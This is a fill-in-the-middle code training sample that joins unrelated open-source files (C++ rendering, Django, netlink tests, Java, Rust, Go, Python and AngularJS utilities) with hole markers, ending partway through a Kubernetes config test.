RendererTextureDesc::RendererTextureDesc(void) { format = RendererTexture::NUM_FORMATS; filter = RendererTexture::FILTER_LINEAR;<|fim▁hole|> height = 0; depth = 1; numLevels = 0; renderTarget = false; data = NULL; } bool RendererTextureDesc::isValid(void) const { bool ok = true; if(format >= RendererTexture2D::NUM_FORMATS) ok = false; if(filter >= RendererTexture2D::NUM_FILTERS) ok = false; if(addressingU >= RendererTexture2D::NUM_ADDRESSING) ok = false; if(addressingV >= RendererTexture2D::NUM_ADDRESSING) ok = false; if(width <= 0 || height <= 0 || depth <= 0) ok = false; // TODO: check for power of two. if(numLevels <= 0) ok = false; if(renderTarget) { if(depth > 1) ok = false; if(format == RendererTexture2D::FORMAT_DXT1) ok = false; if(format == RendererTexture2D::FORMAT_DXT3) ok = false; if(format == RendererTexture2D::FORMAT_DXT5) ok = false; } return ok; }<|fim▁end|>
addressingU = RendererTexture::ADDRESSING_WRAP; addressingV = RendererTexture::ADDRESSING_WRAP; addressingW = RendererTexture::ADDRESSING_WRAP; width = 0;
<|file_name|>UserService.py<|end_file_name|><|fim▁begin|><|fim▁hole|>from django.contrib.auth.models import User from jba_core import exceptions def get_user_by_credentials(username: str, password: str) -> Optional[User]: try: user = User.objects.get(username=username) if not user.check_password(password): raise exceptions.IncorrectCredentials return user except User.DoesNotExist: raise exceptions.UserNotFound except: raise exceptions.SomethingWrong<|fim▁end|>
from typing import Optional
<|file_name|>test_htb_class.py<|end_file_name|><|fim▁begin|>import unittest import socket import os from shapy.framework.netlink.constants import * from shapy.framework.netlink.message import * from shapy.framework.netlink.tc import * from shapy.framework.netlink.htb import * from shapy.framework.netlink.connection import Connection from tests import TCTestCase class TestClass(TCTestCase): def test_add_class(self): self.qhandle = 0x1 << 16 # | 0x1 # major:minor, 1: self.add_htb_qdisc() handle = 0x1 << 16 | 0x1 rate = 256*1000 mtu = 1600 this_dir = os.path.dirname(os.path.realpath(__file__)) with open(os.path.join(this_dir, 'htb_add_class.data'), 'rb') as f: data = f.read() #init = Attr(TCA_HTB_INIT, HTBParms(rate, rate).pack()+data[36+8+4+48:]) init = Attr(TCA_HTB_INIT, HTBParms(rate, rate).pack() + RTab(rate, mtu).pack() + CTab(rate, mtu).pack())<|fim▁hole|> msg = Message(type=RTM_NEWTCLASS, flags=NLM_F_EXCL | NLM_F_CREATE | NLM_F_REQUEST | NLM_F_ACK, service_template=tcm) self.conn.send(msg) self.check_ack(self.conn.recv()) self.delete_root_qdisc() def add_htb_qdisc(self): tcm = tcmsg(socket.AF_UNSPEC, self.interface.if_index, self.qhandle, TC_H_ROOT, 0, [Attr(TCA_KIND, 'htb\0'), HTBQdiscAttr(defcls=0x1ff)]) msg = Message(type=RTM_NEWQDISC, flags=NLM_F_EXCL | NLM_F_CREATE | NLM_F_REQUEST | NLM_F_ACK, service_template=tcm) self.conn.send(msg) r = self.conn.recv() self.check_ack(r) return r<|fim▁end|>
tcm = tcmsg(socket.AF_UNSPEC, self.interface.if_index, handle, self.qhandle, 0, [Attr(TCA_KIND, 'htb\0'), init])
<|file_name|>FileStorageController.java<|end_file_name|><|fim▁begin|>/* * Copyright 2019 EPAM Systems * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and<|fim▁hole|> package com.epam.ta.reportportal.ws.controller; import com.epam.ta.reportportal.commons.EntityUtils; import com.epam.ta.reportportal.commons.ReportPortalUser; import com.epam.ta.reportportal.core.file.DeleteFilesHandler; import com.epam.ta.reportportal.core.file.GetFileHandler; import com.epam.ta.reportportal.core.user.EditUserHandler; import com.epam.ta.reportportal.entity.attachment.BinaryData; import com.epam.ta.reportportal.exception.ReportPortalException; import com.epam.ta.reportportal.util.ProjectExtractor; import com.epam.ta.reportportal.ws.model.OperationCompletionRS; import io.swagger.annotations.ApiOperation; import org.apache.commons.io.IOUtils; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.http.HttpStatus; import org.springframework.http.MediaType; import org.springframework.security.access.prepost.PreAuthorize; import org.springframework.security.core.annotation.AuthenticationPrincipal; import org.springframework.transaction.annotation.Transactional; import org.springframework.web.bind.annotation.*; import org.springframework.web.multipart.MultipartFile; import javax.servlet.http.HttpServletResponse; import java.io.IOException; import java.io.InputStream; import static com.epam.ta.reportportal.auth.permissions.Permissions.*; /** * @author Dzianis_Shybeka */ @RestController @RequestMapping("/v1/data") public class FileStorageController { private final ProjectExtractor projectExtractor; private final EditUserHandler editUserHandler; private final GetFileHandler getFileHandler; private final DeleteFilesHandler deleteFilesHandler; @Autowired public FileStorageController(ProjectExtractor projectExtractor, EditUserHandler editUserHandler, GetFileHandler getFileHandler, DeleteFilesHandler deleteFilesHandler) { this.projectExtractor = projectExtractor; this.editUserHandler = editUserHandler; this.getFileHandler = getFileHandler; this.deleteFilesHandler = deleteFilesHandler; } @Transactional(readOnly = true) @PreAuthorize(ASSIGNED_TO_PROJECT) @GetMapping(value = "/{projectName}/{dataId}") public void getFile(@PathVariable String projectName, @PathVariable("dataId") Long dataId, HttpServletResponse response, @AuthenticationPrincipal ReportPortalUser user) { toResponse(response, getFileHandler.loadFileById(dataId, projectExtractor.extractProjectDetails(user, projectName))); } /** * (non-Javadoc) */ @Transactional(readOnly = true) @GetMapping(value = "/photo") @ApiOperation("Get photo of current user") public void getMyPhoto(@AuthenticationPrincipal ReportPortalUser user, HttpServletResponse response, @RequestParam(value = "loadThumbnail", required = false) boolean loadThumbnail) { toResponse(response, getFileHandler.getUserPhoto(user, loadThumbnail)); } /** * (non-Javadoc) */ @Transactional(readOnly = true) @PreAuthorize(NOT_CUSTOMER) @GetMapping(value = "/{projectName}/userphoto") @ApiOperation("Get user's photo") public void getUserPhoto(@PathVariable String projectName, @RequestParam(value = "id") String username, @RequestParam(value = "loadThumbnail", required = false) boolean loadThumbnail, HttpServletResponse response, @AuthenticationPrincipal ReportPortalUser user) { BinaryData userPhoto = getFileHandler.getUserPhoto(EntityUtils.normalizeId(username), user, projectName, loadThumbnail); toResponse(response, userPhoto); } @Transactional @PostMapping(value = "/photo", consumes = { MediaType.MULTIPART_FORM_DATA_VALUE }) @ApiOperation("Upload user's photo") public OperationCompletionRS uploadPhoto(@RequestParam("file") MultipartFile file, @AuthenticationPrincipal ReportPortalUser user) { return editUserHandler.uploadPhoto(EntityUtils.normalizeId(user.getUsername()), file); } @Transactional @DeleteMapping(value = "/photo") @ApiOperation("Delete user's photo") public OperationCompletionRS deletePhoto(@AuthenticationPrincipal ReportPortalUser user) { return editUserHandler.deletePhoto(EntityUtils.normalizeId(user.getUsername())); } @Transactional @PreAuthorize(ADMIN_ONLY) @PostMapping(value = "/clean", consumes = { MediaType.MULTIPART_FORM_DATA_VALUE }) @ApiOperation("Remove attachments from file storage according to uploaded csv file") public OperationCompletionRS removeAttachmentsByCsv(@RequestParam("file") MultipartFile file, @AuthenticationPrincipal ReportPortalUser user) { return deleteFilesHandler.removeFilesByCsv(file); } /** * Copies data from provided {@link InputStream} to Response * * @param response Response * @param binaryData Stored data */ private void toResponse(HttpServletResponse response, BinaryData binaryData) { //TODO investigate stream closing requirement if (binaryData.getInputStream() != null) { try { response.setContentType(binaryData.getContentType()); IOUtils.copy(binaryData.getInputStream(), response.getOutputStream()); } catch (IOException e) { throw new ReportPortalException("Unable to retrieve binary data from data storage", e); } } else { response.setStatus(HttpStatus.NO_CONTENT.value()); } } }<|fim▁end|>
* limitations under the License. */
<|file_name|>mod.rs<|end_file_name|><|fim▁begin|>// Copyright 2013-2014 The Rust Project Developers. See the COPYRIGHT // file at the top-level directory of this distribution and at // http://rust-lang.org/COPYRIGHT. // // Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or // http://www.apache.org/licenses/LICENSE-2.0> or the MIT license // <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your // option. This file may not be copied, modified, or distributed // except according to those terms. /*! * Collection types. */ #![experimental] pub use core_collections::{Collection, Mutable, Map, MutableMap}; pub use core_collections::{Set, MutableSet, Deque}; pub use core_collections::{Bitv, BitvSet, BTree, DList, EnumSet}; pub use core_collections::{PriorityQueue, RingBuf, SmallIntMap}; pub use core_collections::{TreeMap, TreeSet, TrieMap, TrieSet}; pub use core_collections::{bitv, btree, dlist, enum_set}; pub use core_collections::{priority_queue, ringbuf, smallintmap, treemap, trie};<|fim▁hole|>pub use self::hashmap::{HashMap, HashSet}; pub use self::lru_cache::LruCache; pub mod hashmap; pub mod lru_cache;<|fim▁end|>
<|file_name|>get_device_configuration.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python # # Copyright 2013 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Gets and writes the configurations of the attached devices. This configuration is used by later build steps to determine which devices to install to and what needs to be installed to those devices. """ import optparse import sys from util import build_utils from util import build_device def main(argv): parser = optparse.OptionParser() parser.add_option('--stamp', action='store') parser.add_option('--output', action='store') options, _ = parser.parse_args(argv) devices = build_device.GetAttachedDevices() device_configurations = [] for d in devices: configuration, is_online, has_root = ( build_device.GetConfigurationForDevice(d)) if not is_online: build_utils.PrintBigWarning( '%s is not online. Skipping managed install for this device. '<|fim▁hole|> if not has_root: build_utils.PrintBigWarning( '"adb root" failed on device: %s\n' 'Skipping managed install for this device.' % configuration['description']) continue device_configurations.append(configuration) if len(device_configurations) == 0: build_utils.PrintBigWarning( 'No valid devices attached. Skipping managed install steps.') elif len(devices) > 1: # Note that this checks len(devices) and not len(device_configurations). # This way, any time there are multiple devices attached it is # explicitly stated which device we will install things to even if all but # one device were rejected for other reasons (e.g. two devices attached, # one w/o root). build_utils.PrintBigWarning( 'Multiple devices attached. ' 'Installing to the preferred device: ' '%(id)s (%(description)s)' % (device_configurations[0])) build_device.WriteConfigurations(device_configurations, options.output) if __name__ == '__main__': sys.exit(main(sys.argv))<|fim▁end|>
'Try rebooting the device to fix this warning.' % d) continue
<|file_name|>commio.go<|end_file_name|><|fim▁begin|>package ircbotint import ( "strings" "fmt" "net/http" "io/ioutil" ) var httpUrl string <|fim▁hole|>func SetHttpUrl(url string) { url = strings.Trim(url, "/") url = fmt.Sprintf("%s/", url) httpUrl = url } /** * */ func CallHttp(param1, param2 string) (string, error) { var r *http.Response var err error var s string var ba []byte if len(param2) > 0 { s = fmt.Sprintf("%s%s/%s", httpUrl, param1, param2) } else { s = fmt.Sprintf("%s%s", httpUrl, param1) } r, err = http.Get(s) if err != nil { return "", err } ba, err = ioutil.ReadAll(r.Body) r.Body.Close() if err != nil { return "", err } s = string(ba) return s, nil }<|fim▁end|>
/** * */
<|file_name|>main.rs<|end_file_name|><|fim▁begin|>use cpal::{EventLoop, Format, StreamData, UnknownTypeOutputBuffer}; fn main() { let event_loop = EventLoop::new(); let device = cpal::default_output_device().expect("No device available"); let format = device.default_output_format().expect("no default format"); let stream_id = event_loop.build_output_stream(&device, &format).unwrap(); event_loop.play_stream(stream_id); let mut flippo = true; let mut counter = 0; event_loop.run(move |_stream_id, stream_data| { match stream_data { StreamData::Output { buffer: UnknownTypeOutputBuffer::F32(mut buffer)} => { for elem in buffer.iter_mut() { counter += 1; if counter > 500 { counter = 0; flippo = !flippo; } if flippo { *elem = 1.0; } else { *elem = -1.0; } } }, StreamData::Output { buffer: UnknownTypeOutputBuffer::I16(mut buffer)} => { for elem in buffer.iter_mut() { counter += 1; if counter > 500 { counter = 0; flippo = !flippo; } if flippo { *elem = i16::max_value(); } else { *elem = i16::min_value(); } } }, StreamData::Output { buffer: UnknownTypeOutputBuffer::U16(mut buffer)} => { for elem in buffer.iter_mut() { counter += 1; if counter > 500 { counter = 0; flippo = !flippo; } if flippo { *elem = u16::max_value(); } else { *elem = u16::min_value(); }<|fim▁hole|> } }, _ => {}, } }); }<|fim▁end|>
<|file_name|>CharacterName.java<|end_file_name|><|fim▁begin|>/* * Copyright (c) 2010, 2011, Oracle and/or its affiliates. All rights reserved. * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER. * * This code is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License version 2 only, as<|fim▁hole|> * published by the Free Software Foundation. Oracle designates this * particular file as subject to the "Classpath" exception as provided * by Oracle in the LICENSE file that accompanied this code. * * This code is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License * version 2 for more details (a copy is included in the LICENSE file that * accompanied this code). * * You should have received a copy of the GNU General Public License version * 2 along with this work; if not, write to the Free Software Foundation, * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. * * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA * or visit www.oracle.com if you need additional information or have any * questions. */ package java.lang; import java.io.DataInputStream; import java.io.InputStream; import java.lang.ref.SoftReference; import java.util.Arrays; import java.util.zip.InflaterInputStream; import java.security.AccessController; import java.security.PrivilegedAction; class CharacterName { private static SoftReference<byte[]> refStrPool; private static int[][] lookup; private static synchronized byte[] initNamePool() { byte[] strPool = null; if (refStrPool != null && (strPool = refStrPool.get()) != null) return strPool; DataInputStream dis = null; try { dis = new DataInputStream(new InflaterInputStream( AccessController.doPrivileged(new PrivilegedAction<InputStream>() { public InputStream run() { return getClass().getResourceAsStream("uniName.dat"); } }))); lookup = new int[(Character.MAX_CODE_POINT + 1) >> 8][]; int total = dis.readInt(); int cpEnd = dis.readInt(); byte ba[] = new byte[cpEnd]; dis.readFully(ba); int nameOff = 0; int cpOff = 0; int cp = 0; do { int len = ba[cpOff++] & 0xff; if (len == 0) { len = ba[cpOff++] & 0xff; // always big-endian cp = ((ba[cpOff++] & 0xff) << 16) | ((ba[cpOff++] & 0xff) << 8) | ((ba[cpOff++] & 0xff)); } else { cp++; } int hi = cp >> 8; if (lookup[hi] == null) { lookup[hi] = new int[0x100]; } lookup[hi][cp&0xff] = (nameOff << 8) | len; nameOff += len; } while (cpOff < cpEnd); strPool = new byte[total - cpEnd]; dis.readFully(strPool); refStrPool = new SoftReference<>(strPool); } catch (Exception x) { throw new InternalError(x.getMessage(), x); } finally { try { if (dis != null) dis.close(); } catch (Exception xx) {} } return strPool; } public static String get(int cp) { byte[] strPool = null; if (refStrPool == null || (strPool = refStrPool.get()) == null) strPool = initNamePool(); int off = 0; if (lookup[cp>>8] == null || (off = lookup[cp>>8][cp&0xff]) == 0) return null; @SuppressWarnings("deprecation") String result = new String(strPool, 0, off >>> 8, off & 0xff); // ASCII return result; } }<|fim▁end|>
<|file_name|>utils.py<|end_file_name|><|fim▁begin|>######### # Copyright (c) 2015 GigaSpaces Technologies Ltd. All rights reserved # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # * See the License for the specific language governing permissions and # * limitations under the License. import uuid import json import copy import tempfile import os import getpass import pkg_resources from jinja2 import Template from cloudify.utils import setup_logger import cloudify_agent from cloudify_agent import VIRTUALENV from cloudify_agent.api import defaults logger = setup_logger('cloudify_agent.api.utils') class _Internal(object): """ Contains various internal utility methods. Import this at your own peril, as backwards compatibility is not guaranteed. """ CLOUDIFY_DAEMON_NAME_KEY = 'CLOUDIFY_DAEMON_NAME' CLOUDIFY_DAEMON_STORAGE_DIRECTORY_KEY = 'CLOUDIFY_DAEMON_STORAGE_DIRECTORY' CLOUDIFY_DAEMON_USER_KEY = 'CLOUDIFY_DAEMON_USER' @classmethod def get_daemon_name(cls): """ Returns the name of the currently running daemon. """ return os.environ[cls.CLOUDIFY_DAEMON_NAME_KEY] @classmethod def get_daemon_storage_dir(cls): """ Returns the storage directory the current daemon is stored under. """ return os.environ[cls.CLOUDIFY_DAEMON_STORAGE_DIRECTORY_KEY] @classmethod def get_daemon_user(cls): """ Return the user the current daemon is running under """ return os.environ[cls.CLOUDIFY_DAEMON_USER_KEY] @staticmethod def get_storage_directory(username=None): """ Retrieve path to the directory where all daemon registered under a specific username will be stored. :param username: the user """ return os.path.join(get_home_dir(username), '.cfy-agent') @staticmethod def generate_agent_name(): """ Generates a unique name with a pre-defined prefix """ return '{0}-{1}'.format( defaults.CLOUDIFY_AGENT_PREFIX, uuid.uuid4()) @staticmethod def daemon_to_dict(daemon): """ Return a json representation of the daemon by copying the __dict__ attribute value. Also notice that this implementation removes any attributes starting with the underscore ('_') character. :param daemon: the daemon. :type daemon: cloudify_agent.api.pm.base.Daemon """ try: getattr(daemon, '__dict__') except AttributeError: raise ValueError('Cannot save a daemon with ' 'no __dict__ attribute.') # don't use deepcopy here because we this will try to copy # the internal non primitive attributes original = daemon.__dict__ result = copy.copy(original) for attr in original: if attr.startswith('_'): result.pop(attr) return result internal = _Internal() def get_agent_stats(name, celery): """ Query for agent stats based on agent name. :param name: the agent name :param celery: the celery client to use :return: agents stats :rtype: dict """ destination = 'celery@{0}'.format(name) inspect = celery.control.inspect( destination=[destination]) stats = (inspect.stats() or {}).get(destination) return stats def get_home_dir(username=None): """ Retrieve the home directory of the given user. If no user was specified, the currently logged user will be used. :param username: the user. """ if os.name == 'nt': if username is None: return os.path.expanduser('~') else: return os.path.expanduser('~{0}'.format(username)) else: import pwd if username is None: if 'SUDO_USER' in os.environ: # command was executed via sudo # get the original user username = os.environ['SUDO_USER'] else: username = getpass.getuser() return pwd.getpwnam(username).pw_dir def render_template_to_file(template_path, file_path=None, **values): """ Render a 'jinja' template resource to a temporary file. :param template_path: relative path to the template. :param file_path: absolute path to the desired output file. :param values: keyword arguments passed to jinja. """ template = get_resource(template_path) rendered = Template(template).render(**values) return content_to_file(rendered, file_path) def resource_to_tempfile(resource_path): """ Copy a resource into a temporary file. :param resource_path: relative path to the resource. :return path to the temporary file. """ resource = get_resource(resource_path) return content_to_file(resource) def get_resource(resource_path): """ Loads the resource into a string. :param resource_path: relative path to the resource. """ return pkg_resources.resource_string( cloudify_agent.__name__, os.path.join('resources', resource_path) ) def get_absolute_resource_path(resource_path): """ Retrieves the absolute path in the file system of a resource of the package. :param resource_path: the relative path to the resource """ return pkg_resources.resource_filename( cloudify_agent.__name__, os.path.join('resources', resource_path) ) def content_to_file(content, file_path=None): """ Write string to a temporary file. :param content: :param file_path: absolute path to the desired output file. """ if not file_path: file_path = tempfile.NamedTemporaryFile(mode='w', delete=False).name with open(file_path, 'w') as f: f.write(content) f.write(os.linesep) return file_path def get_executable_path(executable): """ Lookup the path to the executable, os agnostic :param executable: the name of the executable """ if os.name == 'posix': return '{0}/bin/{1}'.format(VIRTUALENV, executable) else: return '{0}\\Scripts\\{1}'.format(VIRTUALENV, executable) def get_cfy_agent_path(): """ Lookup the path to the cfy-agent executable, os agnostic :return: path to the cfy-agent executable """ return get_executable_path('cfy-agent') def get_pip_path(): """ Lookup the path to the pip executable, os agnostic :return: path to the pip executable """ return get_executable_path('pip') def get_celery_path(): """ Lookup the path to the celery executable, os agnostic :return: path to the celery executable """ return get_executable_path('celery') def get_python_path(): """ Lookup the path to the python executable, os agnostic :return: path to the python executable """ return get_executable_path('python') def env_to_file(env_variables, destination_path=None, posix=True): """ Write environment variables to a file. :param env_variables: environment variables :param destination_path: destination path of a file where the environment variables will be stored. the stored variables will be a bash script you can then source. :param posix: false if the target of the generated file will be a windows machine """ if not env_variables: return None if not destination_path: destination_path = tempfile.mkstemp(suffix='env')[1] if posix: linesep = '\n' else:<|fim▁hole|> f.write('#!/bin/bash') f.write(linesep) f.write('# Environmnet file generated by Cloudify. Do not delete ' 'unless you know exactly what you are doing.') f.write(linesep) f.write(linesep) else: f.write('rem Environmnet file generated by Cloudify. Do not ' 'delete unless you know exactly what you are doing.') f.write(linesep) for key, value in env_variables.iteritems(): if posix: f.write('export {0}={1}'.format(key, value)) f.write(linesep) else: f.write('set {0}={1}'.format(key, value)) f.write(linesep) f.write(linesep) return destination_path def stringify_values(dictionary): """ Given a dictionary convert all values into the string representation of the value. useful for dicts that only allow string values (like os.environ) :param dictionary: the dictionary to convert :return: a copy of the dictionary where all values are now string. :rtype: dict """ dict_copy = copy.deepcopy(dictionary) for key, value in dict_copy.iteritems(): if isinstance(value, dict): dict_copy[key] = stringify_values(value) else: dict_copy[key] = str(value) return dict_copy def purge_none_values(dictionary): """ Given a dictionary remove all key who's value is None. Does not purge nested values. :param dictionary: the dictionary to convert :return: a copy of the dictionary where no key has a None value """ dict_copy = copy.deepcopy(dictionary) for key, value in dictionary.iteritems(): if dictionary[key] is None: del dict_copy[key] return dict_copy def json_load(file_path): """ Loads a JSON file into a dictionary. :param file_path: path to the json file """ with open(file_path) as f: return json_loads(f.read()) def json_loads(content): """ Loads a JSON string into a dictionary. If the string is not a valid json, it will be part of the raised exception. :param content: the string to load """ try: return json.loads(content) except ValueError as e: raise ValueError('{0}:{1}{2}'.format(str(e), os.linesep, content))<|fim▁end|>
linesep = '\r\n' with open(destination_path, 'w') as f: if posix:
<|file_name|>YearMonthDurationDV.java<|end_file_name|><|fim▁begin|>/* * Copyright (c) 2007, 2016, Oracle and/or its affiliates. All rights reserved. * ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms. */ /* * Copyright 2004,2005 The Apache Software Foundation. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.sun.org.apache.xerces.internal.impl.dv.xs; import java.math.BigInteger; import javax.xml.datatype.DatatypeConstants; import javax.xml.datatype.Duration; import com.sun.org.apache.xerces.internal.impl.dv.InvalidDatatypeValueException; import com.sun.org.apache.xerces.internal.impl.dv.ValidationContext; /** * Used to validate the <yearMonthDuration> type * * @xerces.internal * * @author Ankit Pasricha, IBM * * @version $Id: YearMonthDurationDV.java,v 1.6 2010-11-01 04:39:47 joehw Exp $ */ class YearMonthDurationDV extends DurationDV { public Object getActualValue(String content, ValidationContext context) throws InvalidDatatypeValueException { try { return parse(content, DurationDV.YEARMONTHDURATION_TYPE); } catch (Exception ex) { throw new InvalidDatatypeValueException("cvc-datatype-valid.1.2.1", new Object[]{content, "yearMonthDuration"}); } } protected Duration getDuration(DateTimeData date) { int sign = 1; if ( date.year<0 || date.month<0) {<|fim▁hole|> } return datatypeFactory.newDuration(sign == 1, date.year != DatatypeConstants.FIELD_UNDEFINED?BigInteger.valueOf(sign*date.year):null, date.month != DatatypeConstants.FIELD_UNDEFINED?BigInteger.valueOf(sign*date.month):null, null, null, null, null); } }<|fim▁end|>
sign = -1;
<|file_name|>grid.service.js<|end_file_name|><|fim▁begin|>(function() { 'use strict'; angular .module('app.grid') .service('GridDemoModelSerivce', GridDemoModelSerivce) .service('GridUtils',GridUtils) .factory('GridFactory',GridFactory) ; GridFactory.$inject = ['modelNode','$q','$filter']; function GridFactory(modelNode,$q,$filter) { return { buildGrid: function (option) { return new Grid(option,modelNode,$q,$filter); } } } function Grid(option,modelNode,$q,$filter) { var self = this; this.page = angular.extend({size: 9, no: 1}, option.page); this.sort = { column: option.sortColumn || '_id', direction: option.sortDirection ||-1, toggle: function (column) { if (column.sortable) { if (this.column === column.name) { this.direction = -this.direction || -1; } else { this.column = column.name; this.direction = -1; } self.paging(); } } }; this.searchForm = option.searchForm; <|fim▁hole|> this.modelling = false; //必须有的 this.model = option.model; if (angular.isString(this.model)) { this.model = modelNode.services[this.model]; } if (!this.model) this.model = angular.noop; var promise; if (angular.isFunction(this.model)) { this.model = this.model(); } promise = $q.when(this.model).then(function (ret) { if (angular.isArray(ret)) { self.rawData = ret; } else { self.modelling = true; } self.setData = setData; self.query = query; self.paging = paging; return self; }); return promise; function setData(data) { self.rawData = data; } function query(param) { var queryParam = angular.extend({}, self.searchForm, param); if (self.modelling) { self.rows = self.model.page(self.page, queryParam, null, (self.sort.direction > 0 ? '' : '-') + self.sort.column); //服务端totals在查询数据时计算 self.model.totals(queryParam).$promise.then(function (ret) { self.page.totals = ret.totals; }); } else { if (self.rawData) self.rows = $filter('filter')(self.rawData, queryParam); } } function paging() { if (this.modelling) { this.query(); } } } GridDemoModelSerivce.$inject = ['Utils']; function GridDemoModelSerivce(Utils) { this.query = query; this.find = find; this.one = one; this.save = save; this.update = update; this.remove = remove; this._demoData_ = []; function query(refresh) { refresh = this._demoData_.length == 0 || refresh; if (refresh) { this._demoData_.length = 0; var MAX_NUM = 10 * 50; for (var i = 0; i < MAX_NUM; ++i) { var id = Utils.rand(0, MAX_NUM); this._demoData_.push({ id: i + 1, name: 'Name' + id, // 字符串类型 followers: Utils.rand(0, 100 * 1000 * 1000), // 数字类型 birthday: moment().subtract(Utils.rand(365, 365 * 50), 'day').toDate(), // 日期类型 summary: '这是一个测试' + i, income: Utils.rand(1000, 100000) // 金额类型 }); } } return this._demoData_; } function one(properties) { return _.findWhere(this._demoData_, properties); } function find(id) { return _.find(this._demoData_, function (item) { return item.id == id; }); } ///为了保证何$resource中的save功能一样此方法用于添加 function save(data) { //添加 this._demoData_.push(_.defaults(data, {})); //if (id != 'new') { // //修改 // var dest = _.bind(find, this, id); // _.extend(dest, data); //} //else { // //} } function update(id,data){ var dest = _.bind(find, this, id); _.extend(dest, data); } function remove(ids) { console.log(this._demoData_.length); this._demoData_ = _.reject(this._demoData_, function (item) { return _.contains(ids, item.id); }); console.log(this._demoData_.length); } } GridUtils.$inject = ['$filter','ViewUtils']; function GridUtils($filter,ViewUtils) { return { paging: paging, totals: totals, hide: hide, width: width, toggleOrderClass: toggleOrderClass, noResultsColspan: noResultsColspan, revertNumber: revertNumber, calcAge: calcAge, formatter: formatter, populateFilter: populateFilter, boolFilter: boolFilter, diFilter: diFilter, repeatInfoCombo: repeatInfoCombo, orFilter: orFilter }; function paging(items, vm) { if (!items) return []; if(vm.serverPaging){ //服务端分页 vm.paged = items; } else{ //客户端分页 var offset = (vm.page.no - 1) * vm.page.size; vm.paged = items.slice(offset, offset + vm.page.size); ////客户端totals在分页数据时计算 vm.page.totals = items.length;//客户端分页是立即触发结果 } return vm.paged; } function totals(items,filter,vm) { if (!items) return 0; if (vm.serverPaging) { //服务端分页 return vm.page.totals; } else { //客户端分页 return items.length || 0 } } function hide(column) { if (!column) return true; return column.hidden === true; } function width(column) { if (!column) return 0; return column.width || 100; } function toggleOrderClass(direction) { if (direction === -1) return "glyphicon-chevron-down"; else return "glyphicon-chevron-up"; } function noResultsColspan(vm) { if (!vm || !vm.columns) return 1; return 1 + vm.columns.length - _.where(vm.columns, {hidden: true}).length; } function revertNumber(num,notConvert) { if (num && !notConvert) { return -num; } return num; } function calcAge(rowValue) { return ViewUtils.age(rowValue) } function formatter(rowValue, columnName, columns) { var one = _.findWhere(columns, {name: columnName}); if(one && !one.hidden) { if (one.formatterData) { if(_.isArray(rowValue)){ return _.map(rowValue,function(o){ return one.formatterData[o]; }); } else{ return one.formatterData[rowValue]; } } } return rowValue; } function populateFilter(rowValue, key) { key = key || 'name'; if(_.isArray(rowValue)){ return _.map(rowValue,function(o){ console.log(o); return ViewUtils.getPropery(o, key); }); } else{ return ViewUtils.getPropery(o, key); } return rowValue; } function boolFilter(rowValue){ return {"1": "是", "0": "否", "true": "是", "false": "否"}[rowValue]; } function diFilter(rowValue,di) { if (_.isArray(rowValue)) { return _.map(rowValue, function (o) { return di[o] || (_.findWhere(di, {value: rowValue}) || {}).name; }); } else { return di[rowValue] || (_.findWhere(di, {value: rowValue}) || {}).name; } } function repeatInfoCombo(repeatValues, repeat_start) { if (_.isArray(repeatValues) && repeatValues.length > 0) { return _.map(repeatValues, function (r) { return r + repeat_start; }).join('\r\n'); } else { return repeat_start; } } /** * AngularJS default filter with the following expression: * "person in people | filter: {name: $select.search, age: $select.search}" * performs a AND between 'name: $select.search' and 'age: $select.search'. * We want to perform a OR. */ function orFilter(items, props) { var out = []; if (_.isArray(items)) { _.each(items,function (item) { var itemMatches = false; var keys = Object.keys(props); for (var i = 0; i < keys.length; i++) { var prop = keys[i]; var text = props[prop].toLowerCase(); if (item[prop].toString().toLowerCase().indexOf(text) !== -1) { itemMatches = true; break; } } if (itemMatches) { out.push(item); } }); } else { // Let the output be the input untouched out = items; } return out; }; } })();<|fim▁end|>
this.rows = []; this.rawData = [];
<|file_name|>config_test.go<|end_file_name|><|fim▁begin|>/* Copyright 2014 Google Inc. All rights reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ package config import ( "sort" "testing" "github.com/GoogleCloudPlatform/kubernetes/pkg/api" "github.com/GoogleCloudPlatform/kubernetes/pkg/client/record" "github.com/GoogleCloudPlatform/kubernetes/pkg/kubelet" "github.com/GoogleCloudPlatform/kubernetes/pkg/types" ) const ( NoneSource = "" TestSource = "test" ) func expectEmptyChannel(t *testing.T, ch <-chan interface{}) { select { case update := <-ch: t.Errorf("Expected no update in channel, Got %v", update) default: } } type sortedPods []api.Pod func (s sortedPods) Len() int { return len(s) } func (s sortedPods) Swap(i, j int) { 